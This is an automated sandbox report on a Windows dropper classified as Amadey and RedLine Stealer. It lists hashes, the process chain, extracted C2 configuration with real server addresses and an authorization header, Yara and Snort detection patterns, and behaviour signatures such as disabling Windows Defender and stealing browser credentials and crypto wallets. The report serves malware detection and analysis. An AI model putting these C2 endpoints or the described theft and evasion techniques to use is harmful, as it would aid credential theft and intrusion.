Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
y0EWt2mE9h.exe

Overview

General Information

Sample Name:y0EWt2mE9h.exe
Original Sample Name:0588e4e46299165692a58b2046b3ea12.exe
Analysis ID:815074
MD5:0588e4e46299165692a58b2046b3ea12
SHA1:642675b7bf9a5897ad906bc1b5f820250ec1b41d
SHA256:f45dd70543ccbc73be3743bac6f7e35179e5192bdd121504d129b74d1ae74996
Tags:Amadeyexe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • y0EWt2mE9h.exe (PID: 1332 cmdline: C:\Users\user\Desktop\y0EWt2mE9h.exe MD5: 0588E4E46299165692A58B2046B3EA12)
    • shS06Up82.exe (PID: 4124 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe MD5: 1D818CDC54AEBE2E587F77D717B0D1C0)
      • sSH13Pp30.exe (PID: 1324 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe MD5: 611B6D7CD33B7C08EFA3757F4080FF78)
        • smi53cv51.exe (PID: 1212 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe MD5: 830F4723EC8EAD8F959AF2AC394E2E8F)
          • iGb20db.exe (PID: 4788 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe MD5: 19C22162FD676451E1967474A4076E6F)
          • kLL28QE.exe (PID: 2992 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe MD5: 3C88EF8689CBDA12A3A7C5D586E5FA04)
  • rundll32.exe (PID: 4332 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 3760 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 1008 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 2492 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "193.233.20.15/dF30Hn4m/index.php", "Version": "3.67"}
{"C2 url": "193.233.20.23:4124", "Bot Id": "rodik", "Authorization Header": "59b6e22e7cfd9b5fa0c99d1942f7c85d"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        SourceRuleDescriptionAuthorStrings
        00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x2da92:$pat14: , CommandLine:
          • 0x1fb77:$v2_1: ListOfProcesses
          • 0x1e29d:$v4_3: base64str
          • 0x1e25c:$v4_4: stringKey
          • 0x1e2a7:$v4_5: BytesToStringConverted
          • 0x1e292:$v4_6: FromBase64
          • 0x1f832:$v4_8: procName
          • 0x1cf84:$v5_5: FileScanning
          • 0x1d1a2:$v5_7: RecordHeaderField
          • 0x1d0d4:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
          00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
            • 0x1118:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
            00000006.00000003.345831738.0000000003170000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 12 entries
              SourceRuleDescriptionAuthorStrings
              6.2.kLL28QE.exe.4a46ebe.3.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                6.2.kLL28QE.exe.4a46ebe.3.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                • 0x2da92:$pat14: , CommandLine:
                • 0x1fb77:$v2_1: ListOfProcesses
                • 0x1e29d:$v4_3: base64str
                • 0x1e25c:$v4_4: stringKey
                • 0x1e2a7:$v4_5: BytesToStringConverted
                • 0x1e292:$v4_6: FromBase64
                • 0x1f832:$v4_8: procName
                • 0x1cf84:$v5_5: FileScanning
                • 0x1d1a2:$v5_7: RecordHeaderField
                • 0x1d0d4:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                6.2.kLL28QE.exe.4a47da6.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  6.2.kLL28QE.exe.4a47da6.2.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x2adaa:$pat14: , CommandLine:
                  • 0x1ce8f:$v2_1: ListOfProcesses
                  • 0x1b5b5:$v4_3: base64str
                  • 0x1b574:$v4_4: stringKey
                  • 0x1b5bf:$v4_5: BytesToStringConverted
                  • 0x1b5aa:$v4_6: FromBase64
                  • 0x1cb4a:$v4_8: procName
                  • 0x1a29c:$v5_5: FileScanning
                  • 0x1a4ba:$v5_7: RecordHeaderField
                  • 0x1a3ec:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                  6.3.kLL28QE.exe.3170000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 28 entries
                    No Sigma rule has matched
                    Timestamp:193.233.20.23192.168.2.54124497032043234 02/25/23-09:08:56.956124
                    SID:2043234
                    Source Port:4124
                    Destination Port:49703
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.5193.233.20.234970341242043233 02/25/23-09:08:55.914790
                    SID:2043233
                    Source Port:49703
                    Destination Port:4124
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.5193.233.20.234970341242043231 02/25/23-09:09:12.429866
                    SID:2043231
                    Source Port:49703
                    Destination Port:4124
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: y0EWt2mE9h.exeReversingLabs: Detection: 69%
                    Source: y0EWt2mE9h.exeVirustotal: Detection: 52%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exeReversingLabs: Detection: 72%
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exeVirustotal: Detection: 70%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeReversingLabs: Detection: 55%
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeVirustotal: Detection: 46%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exeReversingLabs: Detection: 46%
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exeVirustotal: Detection: 46%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeReversingLabs: Detection: 53%
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeVirustotal: Detection: 41%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exeReversingLabs: Detection: 46%
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exeVirustotal: Detection: 48%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeReversingLabs: Detection: 54%
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeReversingLabs: Detection: 56%
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeReversingLabs: Detection: 46%
                    Source: y0EWt2mE9h.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exeJoe Sandbox ML: detected
                    Source: 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.233.20.23:4124", "Bot Id": "rodik", "Authorization Header": "59b6e22e7cfd9b5fa0c99d1942f7c85d"}
                    Source: 0.3.y0EWt2mE9h.exe.49c3020.0.raw.unpackMalware Configuration Extractor: Amadey {"C2 url": "193.233.20.15/dF30Hn4m/index.php", "Version": "3.67"}
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E72F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00E72F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_003E2F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_000E2F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A62F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,3_2_00A62F1D

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeUnpacked PE file: 6.2.kLL28QE.exe.400000.0.unpack
                    Source: y0EWt2mE9h.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: y0EWt2mE9h.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: wextract.pdb source: y0EWt2mE9h.exe, smi53cv51.exe.2.dr, sSH13Pp30.exe.1.dr, shS06Up82.exe.0.dr
                    Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: y0EWt2mE9h.exe, 00000000.00000003.305378937.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, rTV61uz75.exe.0.dr
                    Source: Binary string: wextract.pdbGCTL source: y0EWt2mE9h.exe, smi53cv51.exe.2.dr, sSH13Pp30.exe.1.dr, shS06Up82.exe.0.dr
                    Source: Binary string: C:\sabaje resi\huwa\vacelij.pdb source: smi53cv51.exe, 00000003.00000003.309868418.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000000.344148282.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, nNy98cB79.exe.1.dr, kLL28QE.exe.3.dr
                    Source: Binary string: ^C:\wipirud\pudakucatured\mutuludo\hazucocuhu gat\jez.pdbPg source: sSH13Pp30.exe, 00000002.00000003.308887660.0000000004B4A000.00000004.00000020.00020000.00000000.sdmp, mzc23WZ.exe.2.dr
                    Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: smi53cv51.exe, 00000003.00000003.309868418.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, iGb20db.exe, 00000004.00000000.310286886.0000000000692000.00000002.00000001.01000000.00000007.sdmp, iGb20db.exe.3.dr
                    Source: Binary string: 0C:\sabaje resi\huwa\vacelij.pdbPg source: smi53cv51.exe, 00000003.00000003.309868418.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000000.344148282.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, nNy98cB79.exe.1.dr, kLL28QE.exe.3.dr
                    Source: Binary string: _.pdb source: kLL28QE.exe, kLL28QE.exe, 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\wipirud\pudakucatured\mutuludo\hazucocuhu gat\jez.pdb source: sSH13Pp30.exe, 00000002.00000003.308887660.0000000004B4A000.00000004.00000020.00020000.00000000.sdmp, mzc23WZ.exe.2.dr
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E72390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00E72390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_003E2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_000E2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A62390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00A62390

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.5:49703 -> 193.233.20.23:4124
                    Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.5:49703 -> 193.233.20.23:4124
                    Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.23:4124 -> 192.168.2.5:49703
                    Source: Malware configuration extractorURLs: 193.233.20.15/dF30Hn4m/index.php
                    Source: Malware configuration extractorURLs: 193.233.20.23:4124
                    Source: Joe Sandbox ViewASN Name: REDCOM-ASRedcomKhabarovskRussiaRU REDCOM-ASRedcomKhabarovskRussiaRU
                    Source: Joe Sandbox ViewIP Address: 193.233.20.23 193.233.20.23
                    Source: global trafficTCP traffic: 192.168.2.5:49703 -> 193.233.20.23:4124
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
